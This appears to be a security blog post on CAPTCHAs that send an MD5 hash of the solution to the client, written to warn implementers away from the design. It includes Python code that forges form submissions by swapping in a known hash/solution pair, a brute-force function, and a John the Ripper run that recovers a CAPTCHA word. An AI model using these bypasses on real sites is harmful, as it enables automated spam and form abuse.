Cracking weak CAPTCHA implementations

Asking users to prove that they are not a machine by recognising words formed from distorted characters, a test known as a CAPTCHA, has grown in popularity in recent years. So too has the number of implementations that can be easily cracked by a bot intent on automating the submission of swathes of forms or spam comments.

One of these easy-to-crack implementations that I sometimes come across stores the solution to the CAPTCHA client-side in the form of a hash which, as we'll see, can be easily brute-forced.

Good implementation

When a CAPTCHA is served, the user is generally unaware that the image (containing the distorted words) is accompanied by some form of reference to the original words, which are stored on the server. In popular implementations, such as reCAPTCHA, the reference is typically a unique number or session ID. The server uses this reference to look up the original words when the user submits their guess. Because the reference is unrelated to the words, the words themselves are never exposed to the user.
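The reference-based approach described above can be sketched roughly as follows. This is a minimal illustration, not how reCAPTCHA or any particular library works: the in-memory `_challenges` store and the function names `issue_challenge` and `check_guess` are hypothetical, and making each reference single-use is an extra assumption added here.

```python
import secrets

# Hypothetical in-memory store mapping an opaque reference to the solution.
# A real deployment would more likely use a session store with an expiry.
_challenges: dict[str, str] = {}


def issue_challenge(solution: str) -> str:
    """Keep the solution on the server and return an unguessable reference."""
    reference = secrets.token_urlsafe(16)  # random, unrelated to the solution
    _challenges[reference] = solution
    return reference


def check_guess(reference: str, guess: str) -> bool:
    """Look up the solution by reference and compare it with the guess.

    The reference is removed on first use (an assumption of this sketch),
    so a solved challenge cannot be submitted again.
    """
    solution = _challenges.pop(reference, None)
    if solution is None:
        return False
    return secrets.compare_digest(solution.encode(), guess.encode())
```

Only the reference and the image reach the client, so nothing in the form can be used to work out the words.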


Poor implementation

I have come across a number of less effective implementations that, instead of using a reference unrelated to the words distorted in the CAPTCHA's image, use a hash (often MD5) of the words. When the user submits their guess, the server hashes it and compares the result with the precomputed hash that accompanied the CAPTCHA. A match confirms that the guess was correct.
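To make the flaw concrete, here is a minimal sketch of the hash-based check described above. The function names are hypothetical and the code is a reconstruction of the general pattern, not taken from any specific implementation.

```python
import hashlib


def issue_challenge(solution: str) -> str:
    """Return the value sent to the client with the image: an MD5 of the solution."""
    return hashlib.md5(solution.encode()).hexdigest()


def check_guess(client_hash: str, guess: str) -> bool:
    """Flawed check: compares the guess against a hash that came back from the client."""
    return hashlib.md5(guess.encode()).hexdigest() == client_hash
```

Note that `check_guess` relies entirely on `client_hash`, a value the client can both read and change.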

Weaknesses

Validating a CAPTCHA with a hash opens up two possible weaknesses. Firstly, the original word(s) can be derived by brute-forcing the hash, which is remarkably quick given the limited complexity of the words. Secondly, in a few cases you can simply replace the hash with your own and then supply the words that you used to create it. Both techniques are described below.

Replacing the hash

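Replacing the CAPTCHA's hash with one taken from a previous challenge whose solution is known is often the quickest way to circumvent these poorly implemented CAPTCHAs. It works whenever the server trusts the hash submitted with the form and does not check that it belongs to the challenge it actually issued.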
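The replacement can be sketched as below. Everything here is illustrative: the form field names `captcha_hash` and `captcha_guess` are made up, `flawed_check` stands in for a server that validates as described earlier, and the known solution is simply a word the attacker solved by hand once.

```python
import hashlib


def flawed_check(client_hash: str, guess: str) -> bool:
    """Stand-in for a server that trusts the hash submitted with the form."""
    return hashlib.md5(guess.encode()).hexdigest() == client_hash


# A challenge solved manually once; the pair can then be reused indefinitely.
KNOWN_SOLUTION = "frcws"
KNOWN_HASH = hashlib.md5(KNOWN_SOLUTION.encode()).hexdigest()


def forge_submission(form_fields: dict) -> dict:
    """Overwrite the CAPTCHA fields of a form with the known hash/solution pair."""
    forged = dict(form_fields)  # leave the caller's dict untouched
    forged["captcha_hash"] = KNOWN_HASH
    forged["captcha_guess"] = KNOWN_SOLUTION
    return forged
```

Whatever challenge the server actually issued, the forged fields agree with each other, so a check like `flawed_check` passes.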

Brute-forcing a hash

Hashing every combination of the characters used by the CAPTCHA until one produces the same hash as the one exposed by the CAPTCHA (known as brute-forcing) is also effective. It can be extremely quick, provided that the CAPTCHA doesn't use too many different characters. There are many tools and libraries available for brute-forcing different hashing algorithms; one of the most popular is John the Ripper.
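As a rough illustration of the search itself, the sketch below tries every combination of a given alphabet up to a maximum length. It assumes an unsalted MD5 over lowercase letters; the function name, the default alphabet and the length limit are all assumptions, and a dedicated cracker will be far faster than plain Python.

```python
import hashlib
import itertools
import string


def brute_force_md5(target_hash, alphabet=string.ascii_lowercase, max_length=5):
    """Return the first word whose MD5 equals target_hash, or None if none is found."""
    target = target_hash.lower()
    for length in range(1, max_length + 1):
        # itertools.product yields every combination of the given length
        for candidate in itertools.product(alphabet, repeat=length):
            word = "".join(candidate)
            if hashlib.md5(word.encode()).hexdigest() == target:
                return word
    return None


# Small demo: hash a short word, then recover it from the hash alone.
demo_hash = hashlib.md5(b"cab").hexdigest()
print(brute_force_md5(demo_hash, max_length=3))  # prints "cab"
```

With 26 lowercase letters and five characters there are only 26^5 = 11,881,376 candidates to try, which is why a short, single-case solution offers so little resistance.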

Example

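Below is an example of using John the Ripper to quickly brute-force the hash exposed by a poor CAPTCHA implementation. The -i:CAPTCHA option selects an incremental mode named CAPTCHA, which is not one of John's stock modes and so is presumably a custom mode defined in the John configuration file...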
$> echo -n "d30d0f4fc023858d293b80c6abbc6a83" > ~/captcha.txt
$> john -i:CAPTCHA --format:raw-md5 ~/captcha.txt
Loaded 1 password hash (Raw MD5 [32/32])
frcws            (?)
guesses: 1  time: 0:00:00:07 DONE (Mon June 02 13:56:52 2014)  c/s: 350444  trying: frcws

Conclusion

As shown, CAPTCHAs that rely on a hash of the solution offer very little protection against automated form submissions. The best advice is to avoid such implementations and use a well-tested CAPTCHA such as Google's reCAPTCHA. If you are going to roll your own solution, ensure that nothing shared with the client, other than the image, can be used to derive the solution.